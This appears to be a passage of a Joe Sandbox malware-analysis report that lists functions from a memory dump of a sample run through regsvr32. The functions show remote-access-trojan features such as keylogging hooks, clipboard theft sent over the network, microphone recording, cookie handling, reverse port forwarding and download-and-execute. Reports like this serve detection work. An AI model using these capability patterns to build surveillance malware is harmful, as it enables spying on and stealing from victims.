                                      • Opcode ID: b0744691169e3dc8e13402d34dd8df1c5597df3873e116e0cabcbe2232cec2cb
                                      • Instruction ID: 41e8166980758fd0d5826e1c902679f5cab82b785bcc162637bb7f61be7f66b3
                                      • Opcode Fuzzy Hash: b0744691169e3dc8e13402d34dd8df1c5597df3873e116e0cabcbe2232cec2cb
                                      • Instruction Fuzzy Hash: AE919172E002269ADF209F65C881AEFBBF5AF89794F144599FC05EB180DF35D845CBA0
                                      Function 02A45179 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02A48215: GetLastError.KERNEL32(?,02A3F720,02A3A7F5,02A3F720,02A74EF8,?,02A3CE15,FF8BC35D,02A74EF8,02A74EF8), ref: 02A48219
                                        • Part of subcall function 02A48215: _free.LIBCMT ref: 02A4824C
                                        • Part of subcall function 02A48215: SetLastError.KERNEL32(00000000,FF8BC35D,02A74EF8,02A74EF8), ref: 02A4828D
                                        • Part of subcall function 02A48215: _abort.LIBCMT ref: 02A48293
                                      • _memcmp.LIBVCRUNTIME ref: 02A45423
                                      • _free.LIBCMT ref: 02A45494
                                      • _free.LIBCMT ref: 02A454AD
                                      • _free.LIBCMT ref: 02A454DF
                                      • _free.LIBCMT ref: 02A454E8
                                      • _free.LIBCMT ref: 02A454F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorLast$_abort_memcmp
                                      • String ID: C
                                      • API String ID: 1679612858-1037565863
                                      • Opcode ID: 894ae7defd30c3ca7a13b2ac61a3d06dbc352b583f20a12899c7dde4a079eb5b
                                      • Instruction ID: 683ebe42589933c01395c5fb1958113b94e7ba1f4e266f92051446d0b5781766
                                      • Opcode Fuzzy Hash: 894ae7defd30c3ca7a13b2ac61a3d06dbc352b583f20a12899c7dde4a079eb5b
                                      • Instruction Fuzzy Hash: 87B12775E01219DBDB24DF18C884BADB7B5FB98704F9445AAD94AA7250EF30EE90CF40
                                      Function 02A1490A Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: tcp$udp
                                      • API String ID: 0-3725065008
                                      • Opcode ID: 2bf291d2c3816cc1ba7f71bc1fc32a4c450f7a9cb83d46dfcb30e31ad486b03a
                                      • Instruction ID: 6cfda117094fa107a6bf1b035b501290c1e593c159647a5b29766f694ec5544c
                                      • Opcode Fuzzy Hash: 2bf291d2c3816cc1ba7f71bc1fc32a4c450f7a9cb83d46dfcb30e31ad486b03a
                                      • Instruction Fuzzy Hash: 187169746083429FDB24CF18C584B2ABBE5AF8C369F15482EE99587290EB74C944CB92
                                      Function 02A114F5 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 191COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Eventinet_ntoa
                                      • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                      • API String ID: 3578746661-168337528
                                      • Opcode ID: 6511f7b313402bd3914e5ce847da480495ff5058989c93ae5fa3210b166b275d
                                      • Instruction ID: f79263061d6ed4e1e1f366844b398c0cb10d0a8cad5d03f2dacd08d8fe83211b
                                      • Opcode Fuzzy Hash: 6511f7b313402bd3914e5ce847da480495ff5058989c93ae5fa3210b166b275d
                                      • Instruction Fuzzy Hash: 0351D331E843409BC614FB34DD98B7E77A7AB84364F40091AE90A876D0EF74C91ACF96
                                      Function 02A17CDF Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 108filesynchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02A17F2C: __EH_prolog.LIBCMT ref: 02A17F31
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,02A660A4), ref: 02A17DDC
                                      • CloseHandle.KERNEL32(00000000), ref: 02A17DE5
                                      • DeleteFileA.KERNEL32(00000000), ref: 02A17DF4
                                      • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 02A17DA8
                                        • Part of subcall function 02A04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02A04B36
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                      • String ID: <$@$Temp
                                      • API String ID: 1704390241-1032778388
                                      • Opcode ID: 88208347ea11d5cc9ea887c5016a7985fe6d0a83db0e517df31dc3f512af9fef
                                      • Instruction ID: f42f5f81d353c6a79101e12f8df6176ccdc155f33a689650cc8d131c0493a103
                                      • Opcode Fuzzy Hash: 88208347ea11d5cc9ea887c5016a7985fe6d0a83db0e517df31dc3f512af9fef
                                      • Instruction Fuzzy Hash: 2E419231D802099BDB14FB60EE99BFEB77AAF10310F404169E50A664D0EF741E9ACF91
                                      Function 02A07963 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,02A74EE0,02A65FA4,?,00000000,02A07FFC,00000000), ref: 02A079C5
                                      • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,02A07FFC,00000000,?,?,0000000A,00000000), ref: 02A07A0D
                                        • Part of subcall function 02A04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02A04B36
                                      • CloseHandle.KERNEL32(00000000,?,00000000,02A07FFC,00000000,?,?,0000000A,00000000), ref: 02A07A4D
                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 02A07A6A
                                      • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 02A07A95
                                      • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 02A07AA5
                                        • Part of subcall function 02A04B96: WaitForSingleObject.KERNEL32(?,000000FF,00000000,02A74EF8,02A04C49,00000000,?,?,00000000,02A74EF8,02A04AC9), ref: 02A04BA5
                                        • Part of subcall function 02A04B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02A0548B), ref: 02A04BC3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                      • String ID: .part
                                      • API String ID: 1303771098-3499674018
                                      • Opcode ID: aac0a83d29c2706cbc3148276ca45450343139e9741b6c4907f75ad449201430
                                      • Instruction ID: df8ee0f47b2bfbd903e9b06e77c099dcea4161dad22ac084007e0f4fd670babc
                                      • Opcode Fuzzy Hash: aac0a83d29c2706cbc3148276ca45450343139e9741b6c4907f75ad449201430
                                      • Instruction Fuzzy Hash: 0A318B71488351AFC210EB20ED849DFB3A9FB94354F40491EB58A92180EF74AE08CB96
                                      Function 02A0A2B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 02A0A2D3
                                      • SetWindowsHookExA.USER32(0000000D,02A0A2A4,00000000), ref: 02A0A2E1
                                      • GetLastError.KERNEL32 ref: 02A0A2ED
                                        • Part of subcall function 02A1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02A1B509
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 02A0A33B
                                      • TranslateMessage.USER32(?), ref: 02A0A34A
                                      • DispatchMessageA.USER32(?), ref: 02A0A355
                                      Strings
                                      • Keylogger initialization failure: error , xrefs: 02A0A301
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                      • String ID: Keylogger initialization failure: error
                                      • API String ID: 3219506041-952744263
                                      • Opcode ID: f639d259bcf0d319d40bc0b8876fde04165dff04019c5072b30b760076654174
                                      • Instruction ID: 955f9682b8d55fc950fd0e2bcde5fb0937f920c0b583d19b4be9787dde6b8323
                                      • Opcode Fuzzy Hash: f639d259bcf0d319d40bc0b8876fde04165dff04019c5072b30b760076654174
                                      • Instruction Fuzzy Hash: EA11E332984302EBDB107F75EC8986BB7ECEB95721B00496DF986C6080EF30C511CBA2
                                      Function 02A4AC49 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,02A3EA24,02A3EA24,?,?,?,02A4AE9A,00000001,00000001,73E85006), ref: 02A4ACA3
                                      • __alloca_probe_16.LIBCMT ref: 02A4ACDB
                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,02A4AE9A,00000001,00000001,73E85006,?,?,?), ref: 02A4AD29
                                      • __alloca_probe_16.LIBCMT ref: 02A4ADC0
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,73E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 02A4AE23
                                      • __freea.LIBCMT ref: 02A4AE30
                                        • Part of subcall function 02A46137: RtlAllocateHeap.NTDLL(00000000,02A352BC,?,?,02A38847,?,?,00000000,02A76B50,?,02A0DE62,02A352BC,?,?,?,?), ref: 02A46169
                                      • __freea.LIBCMT ref: 02A4AE39
                                      • __freea.LIBCMT ref: 02A4AE5E
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                      • String ID:
                                      • API String ID: 3864826663-0
                                      • Opcode ID: a145510fa5156d03c227f98aadbaec00d8be0d5c675e8d0df10827475d48ef66
                                      • Instruction ID: 24c44003831909a74c6c26f1fcb59b43b859d63d456dd8d3a60d65031bc94202
                                      • Opcode Fuzzy Hash: a145510fa5156d03c227f98aadbaec00d8be0d5c675e8d0df10827475d48ef66
                                      • Instruction Fuzzy Hash: 9B51F372A80226AFDB258F64CD91FAB77AAEB84754F184628FC15D6181EF34DC41CB90
                                      Function 02A0A3E0 Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32 ref: 02A0A416
                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 02A0A422
                                      • GetKeyboardLayout.USER32(00000000), ref: 02A0A429
                                      • GetKeyState.USER32(00000010), ref: 02A0A433
                                      • GetKeyboardState.USER32(?), ref: 02A0A43E
                                      • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 02A0A461
                                      • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 02A0A4C1
                                      • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 02A0A4FA
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                      • String ID:
                                      • API String ID: 1888522110-0
                                      • Opcode ID: 0521566b3dff1a96116d296a2cd59a3de49db910c0740bc919da81a40fbe3ddd
                                      • Instruction ID: 65a7c50b42b6b2605ce13cd2a8acbd8bb95806c1b3fe3cda192d921da28e4999
                                      • Opcode Fuzzy Hash: 0521566b3dff1a96116d296a2cd59a3de49db910c0740bc919da81a40fbe3ddd
                                      • Instruction Fuzzy Hash: BA316E72584305FFD710DE94DC84F9BB7ECAB88714F00082AB645C7190EBB1E559CB92
                                      Function 02A19993 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 02A199CC
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 02A199ED
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 02A19A0D
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 02A19A21
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 02A19A37
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 02A19A54
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 02A19A6F
                                      • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 02A19A8B
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InputSend
                                      • String ID:
                                      • API String ID: 3431551938-0
                                      • Opcode ID: e07bda24bd420e9400fcc795cd8cb0a6c3282a420e75b82e3338ba08044f59af
                                      • Instruction ID: 5d72b971d83512c5a43601f5df33ab258253a046825583850b76c861a9745539
                                      • Opcode Fuzzy Hash: e07bda24bd420e9400fcc795cd8cb0a6c3282a420e75b82e3338ba08044f59af
                                      • Instruction Fuzzy Hash: 013185715543196EE311CF51D981BEBBBDCDF88764F00080EF6809A1D1D7A295C98B97
                                      Function 02A16940 Relevance: 12.0, APIs: 8, Instructions: 46clipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenClipboard.USER32 ref: 02A16941
                                      • EmptyClipboard.USER32 ref: 02A1694F
                                      • CloseClipboard.USER32 ref: 02A16955
                                      • OpenClipboard.USER32 ref: 02A1695C
                                      • GetClipboardData.USER32(0000000D), ref: 02A1696C
                                      • GlobalLock.KERNEL32(00000000), ref: 02A16975
                                      • GlobalUnlock.KERNEL32(00000000), ref: 02A1697E
                                      • CloseClipboard.USER32 ref: 02A16984
                                        • Part of subcall function 02A04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02A04B36
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                      • String ID:
                                      • API String ID: 2172192267-0
                                      • Opcode ID: b9ec70c72e4f336103a6c15b4eedf7e7ffde0470d88745ebb6393ae5c60eaf99
                                      • Instruction ID: 03d8f321b3feec90707a336c9fb4f5a54862b5aca2143948ae011181f55dc23a
                                      • Opcode Fuzzy Hash: b9ec70c72e4f336103a6c15b4eedf7e7ffde0470d88745ebb6393ae5c60eaf99
                                      • Instruction Fuzzy Hash: 9F015E31A94322DFC714BB71ED8C6AF77AABF84761F400C9DE50A865C0DF24C816CAA1
                                      Function 02A50A25 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: 993a1bbf2571a620aa41d8406230ba8d47528632ed98ad72a3d82ace7e54cfd5
                                      • Instruction ID: cf7091dc09c8221b6eff22a042a41f21856da22ef6d8d5119a0c7b4d5f30ec45
                                      • Opcode Fuzzy Hash: 993a1bbf2571a620aa41d8406230ba8d47528632ed98ad72a3d82ace7e54cfd5
                                      • Instruction Fuzzy Hash: A561DD71D40215AFDB20CF68C881BABBBF5EB49724F15456AEE58EB241EF309D41CB90
                                      Function 02A4B3BC Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,02A4BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 02A4B3FE
                                      • __fassign.LIBCMT ref: 02A4B479
                                      • __fassign.LIBCMT ref: 02A4B494
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 02A4B4BA
                                      • WriteFile.KERNEL32(?,FF8BC35D,00000000,02A4BB31,00000000,?,?,?,?,?,?,?,?,?,02A4BB31,?), ref: 02A4B4D9
                                      • WriteFile.KERNEL32(?,?,00000001,02A4BB31,00000000,?,?,?,?,?,?,?,?,?,02A4BB31,?), ref: 02A4B512
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                      • String ID:
                                      • API String ID: 1324828854-0
                                      • Opcode ID: 82facb4f25d0425c328e3594e45fdf646cebd4324c47ed9c048436975d6a0b7f
                                      • Instruction ID: 1ffa61c7a5812561dabf0a4eff3355f3ae8420f654c924eb0eb8ca51016164a8
                                      • Opcode Fuzzy Hash: 82facb4f25d0425c328e3594e45fdf646cebd4324c47ed9c048436975d6a0b7f
                                      • Instruction Fuzzy Hash: BC519070D00209AFCB10CFA8D885AEEBBF4EF48314F14495AE956E7281EF31D951CBA1
                                      Function 02A01D0B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMON
                                      Download Yara Rule
                                      APIs
                                      • _strftime.LIBCMT ref: 02A01D50
                                        • Part of subcall function 02A01A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 02A01AD9
                                      • waveInUnprepareHeader.WINMM(02A72A88,00000020,00000000,?), ref: 02A01E02
                                      • waveInPrepareHeader.WINMM(02A72A88,00000020), ref: 02A01E40
                                      • waveInAddBuffer.WINMM(02A72A88,00000020), ref: 02A01E4F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                      • String ID: %Y-%m-%d %H.%M$.wav
                                      • API String ID: 3809562944-3597965672
                                      • Opcode ID: ae743aae5468ccc61e33d0b3397cb943d9654009429221acf107eea8da0a792e
                                      • Instruction ID: fea925a8c20d458ff28536de30413b98a5dc50764e573d839b0add629ccbc9ce
                                      • Opcode Fuzzy Hash: ae743aae5468ccc61e33d0b3397cb943d9654009429221acf107eea8da0a792e
                                      • Instruction Fuzzy Hash: 0B3152319843019FD325EB20ED95ADF77EAFB54311F40482AE58D821D0EF70991ACF96
                                      Function 02A0BEE9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02A135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 02A135CA
                                        • Part of subcall function 02A135A6: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 02A135E7
                                        • Part of subcall function 02A135A6: RegCloseKey.ADVAPI32(?), ref: 02A135F2
                                      • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 02A0BF6B
                                      • PathFileExistsA.SHLWAPI(?), ref: 02A0BF78
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                      • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                      • API String ID: 1133728706-4073444585
                                      • Opcode ID: d371b84e4fa6010ae90b3a4afaf49d83c4e8bceb44317177a9130b464eb70dfa
                                      • Instruction ID: 276d3c7c054b68e93af2ba1c4f9fc107e150991579f925c9072af37e98f82c0e
                                      • Opcode Fuzzy Hash: d371b84e4fa6010ae90b3a4afaf49d83c4e8bceb44317177a9130b464eb70dfa
                                      • Instruction Fuzzy Hash: 5A218170AC0219AADB04FBB0EED9DFE776AAF10714F80045AD906671C0EF249949CFD1
                                      Function 02A56B53 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1e78b19a4dd127bec2f45e1f9daebc610cbad6fceda36ee2c4ffc809eff1dac6
                                      • Instruction ID: 4105a1d0d077151f09cdb382f12755390bbfae7bdbf8be12327dbd17b0e3b7de
                                      • Opcode Fuzzy Hash: 1e78b19a4dd127bec2f45e1f9daebc610cbad6fceda36ee2c4ffc809eff1dac6
                                      • Instruction Fuzzy Hash: 7611DF72984225BADB202F768D44E6F7AAEEFC5B30B414619FD11CB250DE34C841CAB0
                                      Function 02A1B380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02A1B3A7
                                      • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 02A1B3BD
                                      • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 02A1B3D6
                                      • InternetCloseHandle.WININET(00000000), ref: 02A1B41C
                                      • InternetCloseHandle.WININET(00000000), ref: 02A1B41F
                                      Strings
                                      • http://geoplugin.net/json.gp, xrefs: 02A1B3B7
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleOpen$FileRead
                                      • String ID: http://geoplugin.net/json.gp
                                      • API String ID: 3121278467-91888290
                                      • Opcode ID: 1e531496fad2964733157f56e5e924686452f397d7c9cd3b0cab08d3201cc0d7
                                      • Instruction ID: 8cc97063955c8486ae0a4a206817a987e039ad62dae9c0e8840f5f7b60a77bea
                                      • Opcode Fuzzy Hash: 1e531496fad2964733157f56e5e924686452f397d7c9cd3b0cab08d3201cc0d7
                                      • Instruction Fuzzy Hash: 7711C8315453226BD624AB25AC89EBF7FADEF85764F00082DF80592180DF64DC45C6F2
                                      Function 02A50EFA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02A50C41: _free.LIBCMT ref: 02A50C6A
                                      • _free.LIBCMT ref: 02A50F48
                                        • Part of subcall function 02A46782: HeapFree.KERNEL32(00000000,00000000,?,02A50C6F,?,00000000,?,00000000,?,02A50F13,?,00000007,?,?,02A5145E,?), ref: 02A46798
                                        • Part of subcall function 02A46782: GetLastError.KERNEL32(?,?,02A50C6F,?,00000000,?,00000000,?,02A50F13,?,00000007,?,?,02A5145E,?,?), ref: 02A467AA
                                      • _free.LIBCMT ref: 02A50F53
                                      • _free.LIBCMT ref: 02A50F5E
                                      • _free.LIBCMT ref: 02A50FB2
                                      • _free.LIBCMT ref: 02A50FBD
                                      • _free.LIBCMT ref: 02A50FC8
                                      • _free.LIBCMT ref: 02A50FD3
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                      • Instruction ID: 1e3144d964a2386026c49c30526fc69e45767e0f0982ddf2a93f738d2e4548d3
                                      • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                      • Instruction Fuzzy Hash: 0C1142715C0714EAD520BB70CE45FCB779EAF4A702F484815AEED66050DEB5F9085F50
                                      Function 02A1B2C3 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02A1BFB7: GetCurrentProcess.KERNEL32(?,?,?,02A0DAAA,WinDir,00000000,00000000), ref: 02A1BFC8
                                        • Part of subcall function 02A135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 02A135CA
                                        • Part of subcall function 02A135A6: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 02A135E7
                                        • Part of subcall function 02A135A6: RegCloseKey.ADVAPI32(?), ref: 02A135F2
                                      • StrToIntA.SHLWAPI(00000000,02A6C9F8,00000000,00000000,00000000,02A750E4,00000003,Exe,00000000,0000000E,00000000,02A660BC,00000003,00000000), ref: 02A1B33C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCurrentOpenProcessQueryValue
                                      • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                      • API String ID: 1866151309-2070987746
                                      • Opcode ID: f40520d51ba2b909d3dc7896a8d912a3a8f6fb7636ae03ac915f0a192e1759ae
                                      • Instruction ID: 4e5a02fc0c761992651db6c6ff580b141ee7e6cd2151f837e85996b286b61a25
                                      • Opcode Fuzzy Hash: f40520d51ba2b909d3dc7896a8d912a3a8f6fb7636ae03ac915f0a192e1759ae
                                      • Instruction Fuzzy Hash: 5E115961EC02006AE704B374DD9EEBF776F9B94734F840967D446A31C0EF549816CBA1
                                      Function 02A3A35A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,?,02A3A351,02A392BE), ref: 02A3A368
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 02A3A376
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02A3A38F
                                      • SetLastError.KERNEL32(00000000,?,02A3A351,02A392BE), ref: 02A3A3E1
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLastValue___vcrt_
                                      • String ID:
